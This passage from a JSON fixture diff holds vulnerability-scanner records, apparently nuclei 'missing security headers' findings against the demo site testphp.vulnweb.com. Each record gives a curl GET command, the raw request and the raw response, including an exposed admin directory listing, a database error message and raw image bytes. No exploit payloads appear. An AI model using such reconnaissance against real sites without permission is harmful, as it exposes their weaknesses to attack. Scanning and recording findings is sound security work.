site</b>\n\n\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\n\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\nWebsite is out of order. Please visit back later. Thank you for understanding.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 799, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:42:02.757Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 800, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:42:02.918Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 801, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:42:03.093Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� i~�7�t���d\u0019\u0018�\b�x+�'\u0019?P��\u001e2E%ݻ[L�9R��ӑ�>z|�5\u000bq�\u000bKkt@[q+�\u000e�\u0004\u0003�􁜌��y4�:\u0016bO&�knK,ViԨɬ�>z5�S�)�\u0002�@���X㳑�\t\u0016P�\u0007,��\u001f���M�庂�&�$�\t�r\u0007A�\u0012r8�����S�\\Igw\u0015�\r�H��8�4æIst�\u000f#���,��\u0007��+��U��/^�'��Y���'�h\u001c�\u0019�X��H'�v9�`�x�\r^oOI,m\u0014L���u\u000b�-���1����\u0018,:��jz}�\u0007�)\u0019�\u001aC�\u0002O��$���ƥo4A^DuG��*@lw������\te�m��2e\u001d��f#\u001d��j�\u0019�\u0015�*���#\u0019�\u001a�\u0004+�YZy\u001a\u0015��1�$)<\u0003��5"�c&�'4f�4S��k=��o4r�p����\u000e\b��ׯJpj��\u0006�L�w�\u0007�e0��Vy\u0002`g�����'�N����u�V��,��7��'���\u0015=tx��iV�RM>�$Aj��G�I!�\u0010U�…\u0003\u0019�$\u001e���*�mF{۝�;I+vO%���4��6y�\b<\u000f����ԯ�!�b�$��x���?���U�Ko��q���@���\u0016f\\*㑜\u0001���I�4��i��IyܤQ��Ҿ��X`\u0005’A�'\u0004`.y��/�]���������:��6��\u001f�g\b��4i-�z:�\u0011gP��Q�0�\u0011��i���'���dG[�\u001c�\u001fO8a�\u0006F\b�{��t}D���5\b��0!��\u0012�\f9\u001d���2s�5�u\r>�loo��]\u001cY���+.v�>��(@�\u0001 \u0013�L'�t��9Y��Ts��5�5l�\u000b�"m�\u001c���p���L\f��5�o48�NE;U%��,��m\u0007h�'�@�y\u0002�}R ��-���\n�pO\u001f�5�U��h��\u0015��X���N>��㑭g\u001704�!V�����\u001fW�O�\u0007��\u000bk\t\u0007���%[Y�C\u0012��A]Č\u0010A�G�]\u001a����\u001eL��Y�9�cX��I!��VF#*\u0003.\u00187\u001fP<�\t�<�Ց�I}$�"��v��\n��>�x�d���\r�\u001f��M�u�}+�\b \u001f�\u0003���\u0019M�'��Y#�f%[�[�>j��6�\u0007,4�y\u001elVh�Y-��H��\u0019��d��c����\u0003A4~夤{������}�^�ۊ�Y\u0011\u001c��\u0005\u0015��\u0014\n��p\u0013S�E\u0015D\u0003�bO<��\u001b�0e8 �V1R*ѐ\u0006���.�m\u0004�Os ���s�6H]��`����3U\u000b1' �x⽣\u001c��%���?W�g�2�"F�#�����\u0003�'��O4v�i�1\u0012_N��=�\u0006��\u0004p>9?\u001d�+���Moq\u001c�\u0001d`ps��W\u0010����sp=ûs�O?��?���Dlk+op�t��Ew�Z_��ݐ�`VN\u001c�[ \f�\u0015�x��rMd�ZD~��3%�O�4�7>�3�\u0007�dc\u0019$p<Ҷ����xgc��xQ�\u0001�4Ţ�q������p#Q�?[s�\u001cu��k�zkj�:^%�v\u0019I7��U�"�{�ɍF��BeKd}\u0001�F@a���\u0003����ۙIPpA��NWZ�\u0017��\u0015U}�m��\u0004���H\r�Ć\u0004s�?��Wv*\u0016K�ܬ,#۵]���9;A\u0003�9.y'�ZuҩF\u001a����3�x34�(���C\u0004;�\b�`%m��\u0001���#?I\f�x2��\u0002=�\u0018�\u0005?$\u001c���x,e�BM\u0019u_i�\u001fKl�>\u0006_�� \u000f��]&����H�Ssl�tI&0�7\u0001���:\u001eǒ9\u0015\u001d.��3�M���C(���Lѣ}>v��*�1��>�\u0007\u0018$�0r\t�~�i\u001d��ΰF�2��񗍷3`+\u0012�\u0018��\u0001�H�HQ��ʉmqs��gEf�-��\u0007gh*3�2�\u001b\u0003��q�5����M�2-�˔"Ux�,Y��v\n��\u001c\u000e2AbR��6�J���=���[�7�\u0014Q]�\u000f\u0014T�*�\f(��t\u0002EM@�\u0015D\u0002jS��Ed�I���32���b=\u001a�\u001a\u001cV�)���\u0001�\t?�o۱\u0015\u001a5���XZU�p$3\u001e8\u001f�\\�\u0002x�Y����12��\u0003r�?��Գ��8=ؼ�Ք�e9\u0004v*���,\u0011f�����8l6d!rz\u0019$*��\u0001�+oC���޳J�y\u0002'��(9w��\u0007�\u001f��\u0004�[S�\u0016{d���tL^!�\u0014ۺ �;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� �,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 802, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:42:03.259Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 803, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:42:03.424Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 804, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:42:03.625Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 805, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:42:03.799Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 806, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:42:03.983Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 807, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:42:04.182Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: 